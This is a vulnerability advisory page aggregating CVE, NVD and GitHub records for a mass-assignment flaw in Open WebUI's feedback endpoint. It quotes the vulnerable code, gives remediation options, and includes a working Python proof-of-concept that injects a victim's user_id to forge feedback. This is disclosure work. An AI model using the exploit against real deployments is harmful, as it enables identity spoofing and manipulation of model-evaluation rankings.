CVE-2026-45396 (GCVE-0-2026-45396)

Vulnerability from cvelistv5 – Published: 2026-05-15 20:33 – Updated: 2026-05-15 22:21

Title

Open WebUI: Mass Assignment via FeedbackForm extra=allow Allows Feedback User ID Spoofing and Evaluation Data Manipulation

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5.

Severity

5.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

CWE

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/open-webui/open-webui/security…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
open-webui	open-webui	Affected: < 0.9.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45396",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-15T22:16:35.297946Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-15T22:21:39.932Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.9.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra=\u0027allow\u0027). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-915",
              "description": "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T20:33:47.570Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g"
        }
      ],
      "source": {
        "advisory": "GHSA-rjmp-vjf2-qf4g",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI: Mass Assignment via FeedbackForm extra=allow Allows Feedback User ID Spoofing and Evaluation Data Manipulation"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45396",
    "datePublished": "2026-05-15T20:33:47.570Z",
    "dateReserved": "2026-05-12T01:48:40.451Z",
    "dateUpdated": "2026-05-15T22:21:39.932Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-45396",
      "date": "2026-05-28",
      "epss": "0.00032",
      "percentile": "0.09669"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-45396\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T21:16:37.590\",\"lastModified\":\"2026-05-19T12:20:29.730\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra=\u0027allow\u0027). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-915\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.9.5\",\"matchCriteriaId\":\"19F64B41-71DA-4E31-A040-1C351A537567\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45396\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-15T22:16:35.297946Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-15T22:17:05.473Z\"}}], \"cna\": {\"title\": \"Open WebUI: Mass Assignment via FeedbackForm extra=allow Allows Feedback User ID Spoofing and Evaluation Data Manipulation\", \"source\": {\"advisory\": \"GHSA-rjmp-vjf2-qf4g\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.9.5\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra=\u0027allow\u0027). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-915\", \"description\": \"CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T20:33:47.570Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-45396\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-15T22:21:39.932Z\", \"dateReserved\": \"2026-05-12T01:48:40.451Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T20:33:47.570Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-45396

Vulnerability from fkie_nvd - Published: 2026-05-15 21:16 - Updated: 2026-05-19 12:20

Severity

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	openwebui	open_webui	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "19F64B41-71DA-4E31-A040-1C351A537567",
              "versionEndExcluding": "0.9.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra=\u0027allow\u0027). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5."
    }
  ],
  "id": "CVE-2026-45396",
  "lastModified": "2026-05-19T12:20:29.730",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T21:16:37.590",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-915"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-RJMP-VJF2-QF4G

Vulnerability from github – Published: 2026-05-14 20:26 – Updated: 2026-05-15 23:55

Summary

Open WebUI: Mass Assignment via FeedbackForm extra=allow Allows Feedback User ID Spoofing and Evaluation Data Manipulation

Details

Mass Assignment in Feedback Creation Allows User ID Spoofing and Evaluation Data Manipulation

Summary

The POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing.

Details

The vulnerability exists in two layers:

1. Model Layer — Insecure Dict Merge Order

File: backend/open_webui/models/feedbacks.py, lines 148–160

async def insert_new_feedback(
    self, user_id: str, form_data: FeedbackForm, db: Optional[AsyncSession] = None
) -> Optional[FeedbackModel]:
    async with get_async_db_context(db) as db:
        id = str(uuid.uuid4())
        feedback = FeedbackModel(
            **{
                'id': id,
                'user_id': user_id,       # ← Server-set from auth token
                'version': 0,
                **form_data.model_dump(),  # ← OVERWRITES 'id', 'user_id', 'version'
                'created_at': int(time.time()),
                'updated_at': int(time.time()),
            }
        )

In Python, when a dictionary literal contains duplicate keys, the last value wins. Since **form_data.model_dump() appears after 'user_id': user_id, any user_id field in the form data overwrites the authenticated user's ID.

2. Schema Layer — `extra='allow'` on Request Form

File: backend/open_webui/models/feedbacks.py, line 106

class FeedbackForm(BaseModel):
    type: str
    data: Optional[RatingData] = None
    meta: Optional[dict] = None
    snapshot: Optional[SnapshotData] = None
    model_config = ConfigDict(extra='allow')  # ← Accepts arbitrary extra fields

The extra='allow' config means Pydantic will accept and preserve any extra fields in the request body, including user_id, id, and version. These are then spread into the FeedbackModel constructor, overwriting server-set values.

Contrast with Secure Pattern

Other models in the same codebase use the correct ordering. For example, backend/open_webui/models/functions.py, line 120:

function = FunctionModel(**{
    **form_data.model_dump(),   # ← Spread FIRST
    'user_id': user_id,         # ← Server value AFTER → always wins
})

And ModelForm at backend/open_webui/models/models.py uses extra='ignore', which is the strictest approach.

Impact

1. User Identity Spoofing

An attacker can create feedback records attributed to any user by specifying their user_id. The admin export endpoint (GET /api/v1/evaluations/feedbacks/export) and admin list (GET /api/v1/evaluations/feedbacks/all) will show the spoofed user_id as the feedback author.

2. Model Evaluation Leaderboard Manipulation

The Elo rating system at backend/open_webui/routers/evaluations.py computes model rankings directly from feedback records. An attacker can inject fake rating feedback to: - Artificially inflate ratings for a specific model - Deflate ratings for competitor models - Make organizational model evaluation decisions unreliable

3. Record ID Control

By injecting a custom id, an attacker controls the UUID of the feedback record. While this won't overwrite existing records (primary key constraint), it enables predictable record IDs that could be useful in other attack chains.

PoC

import requests

BASE_URL = "http://localhost:8080"

# 1. Login as attacker
session = requests.Session()
login_resp = session.post(f"{BASE_URL}/api/v1/auths/signin", json={
    "email": "attacker@example.com",
    "password": "attackerpass"
})
token = login_resp.json()["token"]
headers = {"Authorization": f"Bearer {token}"}

# 2. Create feedback attributed to a different user (victim)
VICTIM_USER_ID = "12345678-aaaa-bbbb-cccc-000000000000"

resp = session.post(
    f"{BASE_URL}/api/v1/evaluations/feedback",
    headers=headers,
    json={
        "type": "rating",
        "data": {
            "model_id": "gpt-4o",
            "rating": 1,
            "sibling_model_ids": ["claude-3-opus"],
        },
        # Mass assignment: these extra fields are accepted due to extra='allow'
        # and overwrite server-set values due to dict merge order
        "user_id": VICTIM_USER_ID,  # Overwrites authenticated user ID
        "version": 999,             # Overwrites default version
    }
)

feedback = resp.json()
print(f"Feedback created with user_id: {feedback['user_id']}")
# Expected: attacker's own user_id
# Actual: VICTIM_USER_ID (12345678-aaaa-bbbb-cccc-000000000000)
assert feedback["user_id"] == VICTIM_USER_ID, "Mass assignment successful!"

Severity

CVSS 3.1: 5.4 (Medium) — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low (any authenticated user)
User Interaction: None
Impact: Integrity (feedback data falsification) + limited Availability (leaderboard reliability)

Suggested Remediation

Option 1: Fix dict merge order (minimal fix)

feedback = FeedbackModel(
    **{
        **form_data.model_dump(),   # Spread FIRST
        'id': id,                    # Server values AFTER (always win)
        'user_id': user_id,
        'version': 0,
        'created_at': int(time.time()),
        'updated_at': int(time.time()),
    }
)

Option 2: Remove `extra='allow'` from FeedbackForm (recommended)

class FeedbackForm(BaseModel):
    type: str
    data: Optional[RatingData] = None
    meta: Optional[dict] = None
    snapshot: Optional[SnapshotData] = None
    model_config = ConfigDict(extra='ignore')  # Reject unexpected fields

Option 3: Explicit field assignment (most secure)

feedback = FeedbackModel(
    id=str(uuid.uuid4()),
    user_id=user_id,
    version=0,
    type=form_data.type,
    data=form_data.data.model_dump() if form_data.data else {},
    meta=form_data.meta or {},
    snapshot=form_data.snapshot.model_dump() if form_data.snapshot else {},
    created_at=int(time.time()),
    updated_at=int(time.time()),
)

Affected Versions

v0.9.2 (current latest, confirmed vulnerable)
Likely all versions since feedback/evaluation feature was introduced

References

Prior advisory: "Mass Assignment via Pydantic extra='allow' Allows Creating Folders in Other Users' Accounts" (patched in v0.9.0) — same root cause class, different endpoint

Severity

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45396"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:26:18Z",
    "nvd_published_at": "2026-05-15T21:16:37Z",
    "severity": "MODERATE"
  },
  "details": "# Mass Assignment in Feedback Creation Allows User ID Spoofing and Evaluation Data Manipulation\n\n## Summary\n\nThe `POST /api/v1/evaluations/feedback` endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via `FeedbackForm`, which uses `model_config = ConfigDict(extra=\u0027allow\u0027)`. Due to an insecure dictionary merge order in `insert_new_feedback()`, an authenticated attacker can inject a `user_id` field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing.\n\n## Details\n\nThe vulnerability exists in two layers:\n\n### 1. Model Layer \u2014 Insecure Dict Merge Order\n\n**File:** `backend/open_webui/models/feedbacks.py`, lines 148\u2013160\n\n```python\nasync def insert_new_feedback(\n    self, user_id: str, form_data: FeedbackForm, db: Optional[AsyncSession] = None\n) -\u003e Optional[FeedbackModel]:\n    async with get_async_db_context(db) as db:\n        id = str(uuid.uuid4())\n        feedback = FeedbackModel(\n            **{\n                \u0027id\u0027: id,\n                \u0027user_id\u0027: user_id,       # \u2190 Server-set from auth token\n                \u0027version\u0027: 0,\n                **form_data.model_dump(),  # \u2190 OVERWRITES \u0027id\u0027, \u0027user_id\u0027, \u0027version\u0027\n                \u0027created_at\u0027: int(time.time()),\n                \u0027updated_at\u0027: int(time.time()),\n            }\n        )\n```\n\nIn Python, when a dictionary literal contains duplicate keys, the **last value wins**. Since `**form_data.model_dump()` appears after `\u0027user_id\u0027: user_id`, any `user_id` field in the form data overwrites the authenticated user\u0027s ID.\n\n### 2. Schema Layer \u2014 `extra=\u0027allow\u0027` on Request Form\n\n**File:** `backend/open_webui/models/feedbacks.py`, line 106\n\n```python\nclass FeedbackForm(BaseModel):\n    type: str\n    data: Optional[RatingData] = None\n    meta: Optional[dict] = None\n    snapshot: Optional[SnapshotData] = None\n    model_config = ConfigDict(extra=\u0027allow\u0027)  # \u2190 Accepts arbitrary extra fields\n```\n\nThe `extra=\u0027allow\u0027` config means Pydantic will accept and preserve any extra fields in the request body, including `user_id`, `id`, and `version`. These are then spread into the `FeedbackModel` constructor, overwriting server-set values.\n\n### Contrast with Secure Pattern\n\nOther models in the same codebase use the correct ordering. For example, `backend/open_webui/models/functions.py`, line 120:\n\n```python\nfunction = FunctionModel(**{\n    **form_data.model_dump(),   # \u2190 Spread FIRST\n    \u0027user_id\u0027: user_id,         # \u2190 Server value AFTER \u2192 always wins\n})\n```\n\nAnd `ModelForm` at `backend/open_webui/models/models.py` uses `extra=\u0027ignore\u0027`, which is the strictest approach.\n\n## Impact\n\n### 1. User Identity Spoofing\nAn attacker can create feedback records attributed to any user by specifying their `user_id`. The admin export endpoint (`GET /api/v1/evaluations/feedbacks/export`) and admin list (`GET /api/v1/evaluations/feedbacks/all`) will show the spoofed `user_id` as the feedback author.\n\n### 2. Model Evaluation Leaderboard Manipulation\nThe Elo rating system at `backend/open_webui/routers/evaluations.py` computes model rankings directly from feedback records. An attacker can inject fake rating feedback to:\n- Artificially inflate ratings for a specific model\n- Deflate ratings for competitor models\n- Make organizational model evaluation decisions unreliable\n\n### 3. Record ID Control\nBy injecting a custom `id`, an attacker controls the UUID of the feedback record. While this won\u0027t overwrite existing records (primary key constraint), it enables predictable record IDs that could be useful in other attack chains.\n\n## PoC\n\n```python\nimport requests\n\nBASE_URL = \"http://localhost:8080\"\n\n# 1. Login as attacker\nsession = requests.Session()\nlogin_resp = session.post(f\"{BASE_URL}/api/v1/auths/signin\", json={\n    \"email\": \"attacker@example.com\",\n    \"password\": \"attackerpass\"\n})\ntoken = login_resp.json()[\"token\"]\nheaders = {\"Authorization\": f\"Bearer {token}\"}\n\n# 2. Create feedback attributed to a different user (victim)\nVICTIM_USER_ID = \"12345678-aaaa-bbbb-cccc-000000000000\"\n\nresp = session.post(\n    f\"{BASE_URL}/api/v1/evaluations/feedback\",\n    headers=headers,\n    json={\n        \"type\": \"rating\",\n        \"data\": {\n            \"model_id\": \"gpt-4o\",\n            \"rating\": 1,\n            \"sibling_model_ids\": [\"claude-3-opus\"],\n        },\n        # Mass assignment: these extra fields are accepted due to extra=\u0027allow\u0027\n        # and overwrite server-set values due to dict merge order\n        \"user_id\": VICTIM_USER_ID,  # Overwrites authenticated user ID\n        \"version\": 999,             # Overwrites default version\n    }\n)\n\nfeedback = resp.json()\nprint(f\"Feedback created with user_id: {feedback[\u0027user_id\u0027]}\")\n# Expected: attacker\u0027s own user_id\n# Actual: VICTIM_USER_ID (12345678-aaaa-bbbb-cccc-000000000000)\nassert feedback[\"user_id\"] == VICTIM_USER_ID, \"Mass assignment successful!\"\n```\n\n## Severity\n\n**CVSS 3.1:** 5.4 (Medium) \u2014 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L`\n\n- **Attack Vector:** Network\n- **Attack Complexity:** Low\n- **Privileges Required:** Low (any authenticated user)\n- **User Interaction:** None\n- **Impact:** Integrity (feedback data falsification) + limited Availability (leaderboard reliability)\n\n## Suggested Remediation\n\n### Option 1: Fix dict merge order (minimal fix)\n```python\nfeedback = FeedbackModel(\n    **{\n        **form_data.model_dump(),   # Spread FIRST\n        \u0027id\u0027: id,                    # Server values AFTER (always win)\n        \u0027user_id\u0027: user_id,\n        \u0027version\u0027: 0,\n        \u0027created_at\u0027: int(time.time()),\n        \u0027updated_at\u0027: int(time.time()),\n    }\n)\n```\n\n### Option 2: Remove `extra=\u0027allow\u0027` from FeedbackForm (recommended)\n```python\nclass FeedbackForm(BaseModel):\n    type: str\n    data: Optional[RatingData] = None\n    meta: Optional[dict] = None\n    snapshot: Optional[SnapshotData] = None\n    model_config = ConfigDict(extra=\u0027ignore\u0027)  # Reject unexpected fields\n```\n\n### Option 3: Explicit field assignment (most secure)\n```python\nfeedback = FeedbackModel(\n    id=str(uuid.uuid4()),\n    user_id=user_id,\n    version=0,\n    type=form_data.type,\n    data=form_data.data.model_dump() if form_data.data else {},\n    meta=form_data.meta or {},\n    snapshot=form_data.snapshot.model_dump() if form_data.snapshot else {},\n    created_at=int(time.time()),\n    updated_at=int(time.time()),\n)\n```\n\n## Affected Versions\n\n- v0.9.2 (current latest, confirmed vulnerable)\n- Likely all versions since feedback/evaluation feature was introduced\n\n## References\n\n- Prior advisory: \"Mass Assignment via Pydantic extra=\u0027allow\u0027 Allows Creating Folders in Other Users\u0027 Accounts\" (patched in v0.9.0) \u2014 same root cause class, different endpoint",
  "id": "GHSA-rjmp-vjf2-qf4g",
  "modified": "2026-05-15T23:55:14Z",
  "published": "2026-05-14T20:26:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45396"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI: Mass Assignment via FeedbackForm extra=allow Allows Feedback User ID Spoofing and Evaluation Data Manipulation"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-45396 (GCVE-0-2026-45396)

FKIE_CVE-2026-45396

GHSA-RJMP-VJF2-QF4G

Mass Assignment in Feedback Creation Allows User ID Spoofing and Evaluation Data Manipulation

Summary

Details

1. Model Layer — Insecure Dict Merge Order

2. Schema Layer — extra='allow' on Request Form

Contrast with Secure Pattern

Impact

1. User Identity Spoofing

2. Model Evaluation Leaderboard Manipulation

3. Record ID Control

PoC

Severity

Suggested Remediation

Option 1: Fix dict merge order (minimal fix)

Option 2: Remove extra='allow' from FeedbackForm (recommended)

Option 3: Explicit field assignment (most secure)

Affected Versions

References

Tags

Sightings

Nomenclature

2. Schema Layer — `extra='allow'` on Request Form

Option 2: Remove `extra='allow'` from FeedbackForm (recommended)